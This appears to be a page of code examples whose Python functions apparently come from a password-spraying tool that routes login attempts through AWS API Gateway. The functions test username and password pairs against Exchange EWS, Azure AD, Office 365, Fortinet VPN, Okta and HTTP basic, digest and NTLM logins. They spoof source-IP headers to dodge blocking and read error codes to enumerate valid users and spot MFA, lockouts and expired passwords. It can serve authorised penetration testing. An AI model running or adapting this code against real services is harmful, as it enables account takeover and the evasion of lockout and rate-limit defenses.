Beispiel #1
0
def testconnect(pluginargs, args, api_dict, useragent):

    url = api_dict['proxy_url']

    success = True
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For" : generate_ip(),
        "x-amzn-apigateway-api-id" : generate_id(),
        "X-My-X-Amzn-Trace-Id" : generate_trace_id(),
    }

    resp = requests.get(url, headers=headers, verify=False)

    if resp.status_code == 504:
        output = "Testconnect: Connection failed, endpoint timed out, exiting"
        success = False
    else:
        output = "Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing"

    if success:
        domainname = get_owa_domain(url, "/autodiscover/autodiscover.xml", useragent)
        output = output.format(domain=domainname)
        pluginargs['domain'] = domainname

    return success, output, pluginargs
Beispiel #2
0
def ews_authenticate(url, username, password, useragent, pluginargs):

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
        "Content-Type": "text/xml"
    }

    try:

        resp = requests.post("{}/ews/".format(url),
                             headers=headers,
                             auth=HttpNtlmAuth(username, password),
                             verify=False)

        if resp.status_code != 401:
            data_response['success'] = True
            data_response[
                'output'] = f"[+] Found credentials, code: {resp.status_code}: {username}:{password}"

        else:
            data_response['success'] = False
            data_response[
                'output'] = f"[-] Authentication failed: {username}:{password} (Invalid credentials)"

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #3
0
def testconnect(pluginargs, args, api_dict, useragent):

    success = True
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    resp = requests.get(api_dict['proxy_url'], headers=headers)

    if resp.status_code == 504:
        output = "Testconnect: Connection failed, endpoint timed out, exiting"
        success = False
    else:
        output = "Testconnect: Connection success, continuting"

    return success, output, pluginargs
Beispiel #4
0
def testconnect(pluginargs, args, api_dict, useragent):

    success = True
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    resp = requests.get(api_dict['proxy_url'] + "/remote/login?lang=en",
                        headers=headers)

    if resp.status_code == 504:
        output = "Testconnect: Connection failed, endpoint timed out, exiting"
        success = False
    elif "fortinet" in resp.text:
        output = "Testconnect: Verified Fortinet instance, connected"
    else:
        output = "Testconnect: Warning, Fortinet client not indicated, continuting"

    return success, output, pluginargs
Beispiel #5
0
def msol_authenticate(url, username, password, useragent, pluginargs):

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
		'sourceip' : None,
        'throttled' : False,
		'error' : False,
        'output' : ""
    }

    body = {
        'resource': 'https://graph.windows.net',
        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
        'client_info': '1',
        'grant_type': 'password',
        'username': username,
        'password': password,
        'scope': 'openid',
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    headers = {
        "X-My-X-Forwarded-For" : spoofed_ip,
        "x-amzn-apigateway-api-id" : amazon_id,
        "X-My-X-Amzn-Trace-Id" : trace_id,
        "User-Agent" : useragent,

        'Accept': 'application/json',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    try:
        resp = requests.post("{}/common/oauth2/token".format(url), headers=headers, data=body)
        data_response['code'] = resp.status_code

        if resp.status_code == 200:
            data_response['success'] = True
            data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password}"

        else:
            response = resp.json()
            error = response["error_description"]

            if "AADSTS50126" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Invalid username or password. Username: {username} could exist."

            elif "AADSTS50128" in error or "AADSTS50059" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Tenant for account {username} is not using AzureAD/Office365"

            elif "AADSTS50034" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} The user {username} doesn't exist."

            elif "AADSTS50079" in error or "AADSTS50076" in error:
                # Microsoft MFA response
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Microsoft"
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates MFA (Microsoft) is in use."


            elif "AADSTS50158" in error:
                # Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Other"
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates conditional access (MFA: DUO or other) is in use."


            elif "AADSTS50053" in error:
                # Locked out account or Smart Lockout in place
                data_response['success'] = False
                data_response['output'] = f"WARNING! {resp.status_code} The account {username} appears to be locked."


            elif "AADSTS50055" in error:
                # User password is expired
                data_response['change'] = True
                data_response['success'] = True
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The user's password is expired."

            else:
                # Unknown errors
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Got an error we haven't seen yet for user {username}"

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #6
0
def template_authenticate(
        url, username, password, useragent,
        pluginargs):  # CHANGEME: replace template with plugin name

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    # not all of these are used, provided for future dev if needed
    # Only ones necessary to return at the moment are:
    # error
    # output
    # success
    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    # CHANGEME: Add more if necessary
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
    }

    try:

        resp = requests.post("{}/uri".format(url), headers=headers)

        if Success:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_MESSAGE: => {}:{}'.format(
                username, password)

        elif Success_but_2fa:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_2FA_MESSAGE: => {}:{}'.format(
                username, password)
            data_response['2fa_enabled'] = True

        elif lockout_or_pwd_expired_or_other:
            data_response['success'] = False
            data_response['output'] = 'ISSUE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)

        else:  #fail
            data_response['success'] = False
            data_response['output'] = 'FAILURE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)
            data_response['2fa_enabled'] = True

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #7
0
def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip' : None,
        'throttled' : False,
        'error' : False,
        'output' : ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    # CHANGEME: Add more if necessary
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For" : spoofed_ip,
        "x-amzn-apigateway-api-id" : amazon_id,
        "X-My-X-Amzn-Trace-Id" : trace_id,

        'Content-Type': 'application/x-www-form-urlencoded'
    }

    post_params = {
        "ajax" : '1',
        'username' : username,
        'credential' : password,
        'realm' : ''
    }

    if 'domain' in pluginargs.keys():
        post_params['realm'] = pluginargs['domain']

    try:

        resp = requests.post("{}/remote/logincheck".format(url),data=post_params,headers=headers)

        if resp.status_code == 200 and 'redir=' in resp.text and '&portal=' in resp.text:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
            if 'domain' in pluginargs.keys():
                data_response['output'] = data_response['output'] + " Domain: {}".format(pluginargs['domain'])

        else: #fail
            data_response['success'] = False
            data_response['output'] = 'FAILURE: {} => {}:{}'.format(resp.status_code, username, password)


    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #8
0
def o365_authenticate(url, username, password, useragent, pluginargs):

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
        "Content-Type": "text/xml"
    }

    try:
        r = requests.get("{}/autodiscover/autodiscover.xml".format(url),
                         auth=(username, password),
                         headers=headers,
                         verify=False,
                         timeout=30)

        if r.status_code == 200:
            data_response['output'] = "SUCCESS: {username}:{password}".format(
                username=username, password=password)
            data_response['success'] = True
        elif r.status_code == 456:
            data_response[
                'output'] = "SUCCESS: {username}:{password} - 2FA or Locked".format(
                    username=username, password=password)
            data_response['success'] = True
        else:
            data_response['output'] = "FAILED: {username}:{password}".format(
                username=username, password=password)
            data_response['success'] = False

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #9
0
 def get(self, *_args, **_kwargs):
     self.success(data=dict(generate_id=generate_id()))
Beispiel #10
0
def httpbrute_authenticate(
        url, username, password, useragent,
        pluginargs):  # CHANGEME: replace template with plugin name

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    # CHANGEME: Add more if necessary
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
    }

    try:

        resp = None

        full_url = "{}/{}".format(url, pluginargs['uri'])

        if pluginargs['auth'] == 'basic':
            auth = requests.auth.HTTPBasicAuth(username, password)
            resp = requests.get(url=full_url,
                                auth=auth,
                                verify=False,
                                timeout=30)

        elif pluginargs['auth'] == 'digest':
            auth = requests.auth.HTTPDigestAuth(username, password)
            resp = requests.get(url=full_url,
                                auth=auth,
                                verify=False,
                                timeout=30)

        else:  # NTLM
            auth = requests_ntlm.HttpNtlmAuth(username, password)
            resp = requests.get(url=full_url,
                                auth=auth,
                                verify=False,
                                timeout=30)

        if resp.status_code == 200:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS: => {}:{}'.format(
                username, password)

        elif resp.status_code == 401:
            data_response['success'] = False
            data_response['output'] = 'FAILURE: => {}:{}'.format(
                username, password)

        else:  #fail
            data_response['success'] = False
            data_response[
                'output'] = 'UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(
                    resp.status_code, username, password)

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #11
0
def okta_authenticate(url, username, password, useragent, pluginargs):

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    raw_body = "{\"username\":\"%s\",\"password\":\"%s\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true}}" % (
        username, password)

    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
        'Content-Type': 'application/json'
    }

    try:
        resp = requests.post("{}/api/v1/authn/".format(url),
                             data=raw_body,
                             headers=headers)

        if resp.status_code == 200:
            resp_json = json.loads(resp.text)

            if resp_json.get(
                    "status"
            ) == "LOCKED_OUT":  #Warning: administrators can configure Okta to not indicate that an account is locked out. Fair warning ;)
                data_response['success'] = False
                data_response['output'] = 'FAILED: Locked out {}:{}'.format(
                    username, password)
                data_response['action'] = 'redirect'

            elif resp_json.get("status") == "SUCCESS":
                data_response['success'] = True
                data_response['output'] = 'SUCCESS: => {}:{}'.format(
                    username, password)

            elif resp_json.get("status") == "MFA_REQUIRED":
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['output'] = "SUCCESS: 2FA => {}:{}".format(
                    username, password)

            elif resp_json.get("status") == "PASSWORD_EXPIRED":
                data_response['change'] = True
                data_response['success'] = True
                data_response[
                    'output'] = "SUCCESS: password expired {}:{}".format(
                        username, password)

            else:
                data_response['success'] = False
                data_response[
                    'output'] = "ALERT: 200 but doesn't indicate success {}:{}".format(
                        username, password)
        elif resp.status_code == 403:
            data_response['success'] = False
            data_response['code'] = resp.status_code
            data_response[
                'output'] = "FAILED THROTTLE INDICATED: {} => {}:{}".format(
                    resp.status_code, username, password)
        else:
            data_response['success'] = False
            data_response['code'] = resp.status_code
            data_response['output'] = "FAILED: {} => {}:{}".format(
                resp.status_code, username, password)

    except Exception as ex:
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response